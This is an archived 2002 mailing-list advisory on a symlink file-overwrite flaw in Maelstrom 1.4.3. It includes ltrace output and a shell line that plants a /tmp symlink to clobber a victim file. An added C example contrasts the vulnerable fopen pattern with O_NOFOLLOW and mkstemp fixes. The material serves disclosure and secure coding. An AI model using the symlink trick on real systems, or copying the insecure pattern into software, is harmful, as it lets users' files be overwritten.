Maelstrom 1.4.3 arbitrary file overwrite

From: Andrew Griffiths (andrewgat_private)
Date: Sun Jan 20 2002 - 01:16:30 PST


    Program: Maelstrom
    Version: 1.4.3
    Distribution: RedHat 7.1
    
    When trying to break stuff, ltracing Maelstrom showed the following:
    
    fopen("/tmp/f", "w")                              = 0x08081f58
    fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
    fclose(0x08081f58)                                = 0
    
    Which made me wonder if it followed symbolic links, by doing
    
    [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >  /tmp/bla; \
    ln -s /tmp/bla f)
    
    at which point I ran it again, and when I did cat /tmp/bla, I got
    
    Main program = Maelstrom
    
    Conclusion:
    -=-=-=-=-=-
    
    You can overwrite arbitrary files with the permissions of the user who ran
    it.
    
    Of course, this won't work on systems that have linking restrictions in /tmp.
    
    Fixing it
    -=-=-=-=-
    
    Remove the code that does the above.
    
    
    --
    www.tasmail.com
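
The post's fixed-path `fopen("/tmp/f", "w")` beside two safer replacements, as an added example that is not code from the post or from the Maelstrom project. It assumes a POSIX system (`open(2)` with `O_NOFOLLOW`, `mkstemp(3)`, `mkdtemp(3)`), and `demo_symlink_behaviour` re-creates the reported scenario entirely inside a private temporary directory it makes and removes itself: a victim file, a symlink `f` pointing at it, and a write aimed at `f`. The function names and the `/tmp/symlink-demo-XXXXXX` directory template are this example's own.

```c
/* Added example, not code from the post or from the Maelstrom project.
 * Assumes a POSIX system (open(2) with O_NOFOLLOW, mkstemp(3), mkdtemp(3)).
 * All paths are created inside a private temporary directory. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The pattern the post found: a fixed, predictable path opened with
 * fopen("w"). fopen follows a symlink at that path and truncates whatever
 * it points to. Returns 0 on success, -1 on failure. */
int write_fixed_path_insecure(const char *path, const char *line) {
    FILE *fp = fopen(path, "w");
    if (fp == NULL) return -1;
    fputs(line, fp);
    fclose(fp);
    return 0;
}

/* Hardened open of a fixed path: O_CREAT|O_EXCL fails if anything (a file,
 * even a dangling symlink) already exists there, O_NOFOLLOW refuses to
 * follow a symlink, and mode 0600 keeps the file private. Returns 0 on
 * success or a negative errno value. */
int write_fixed_path_hardened(const char *path, const char *line) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -errno;
    FILE *fp = fdopen(fd, "w");
    if (fp == NULL) { int e = errno; close(fd); return -e; }
    fputs(line, fp);
    fclose(fp);
    return 0;
}

/* Preferred fix: no fixed name at all. mkstemp picks an unpredictable name
 * and creates it atomically with mode 0600; the chosen path is copied into
 * out so the caller can unlink it later. */
int write_unique_tmpfile(const char *dir, const char *line, char *out, size_t outlen) {
    char tmpl[PATH_MAX];
    if (snprintf(tmpl, sizeof tmpl, "%s/maelstrom-XXXXXX", dir) >= (int)sizeof tmpl)
        return -ENAMETOOLONG;
    int fd = mkstemp(tmpl);
    if (fd < 0) return -errno;
    FILE *fp = fdopen(fd, "w");
    if (fp == NULL) { int e = errno; close(fd); unlink(tmpl); return -e; }
    fputs(line, fp);
    fclose(fp);
    snprintf(out, outlen, "%s", tmpl);
    return 0;
}

/* Reads the first line of path into buf (empty string if unreadable). */
static void read_first_line(const char *path, char *buf, size_t n) {
    buf[0] = '\0';
    FILE *fp = fopen(path, "r");
    if (fp == NULL) return;
    if (fgets(buf, (int)n, fp) == NULL) buf[0] = '\0';
    fclose(fp);
}

/* Re-creates the post's scenario in a private directory: a victim file
 * containing "bla", a symlink f -> victim, and a write aimed at f.
 * Returns 1 if the hardened writer refused the symlink and left the victim
 * intact while the insecure writer followed it and clobbered the victim;
 * 0 otherwise. */
int demo_symlink_behaviour(void) {
    char dir[] = "/tmp/symlink-demo-XXXXXX";   /* constructed, private dir */
    if (mkdtemp(dir) == NULL) return 0;
    char victim[PATH_MAX], link[PATH_MAX], buf[64];
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/f", dir);
    int ok = 0;
    if (write_fixed_path_hardened(victim, "bla\n") == 0 && symlink(victim, link) == 0) {
        int rc = write_fixed_path_hardened(link, "Main program = Maelstrom\n");
        read_first_line(victim, buf, sizeof buf);
        int hardened_ok = (rc < 0) && strcmp(buf, "bla\n") == 0;
        write_fixed_path_insecure(link, "Main program = Maelstrom\n");
        read_first_line(victim, buf, sizeof buf);
        int insecure_clobbered = strcmp(buf, "Main program = Maelstrom\n") == 0;
        ok = hardened_ok && insecure_clobbered;
    }
    unlink(link); unlink(victim); rmdir(dir);
    return ok;
}

int main(void) {
    printf("symlink demo: %s\n", demo_symlink_behaviour()
           ? "hardened writer refused, insecure writer followed the link"
           : "unexpected result");
    return 0;
}
```

The hardened open still has a fixed name, so a pre-existing file or link at that path simply makes the program fail rather than overwrite; that is the right failure mode, but the `mkstemp` variant avoids the predictable name altogether and is what "remove the code that does the above" should be replaced with if the file is actually needed.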
    



    This archive was generated by hypermail 2b30 : Sun Jan 20 2002 - 13:59:37 PST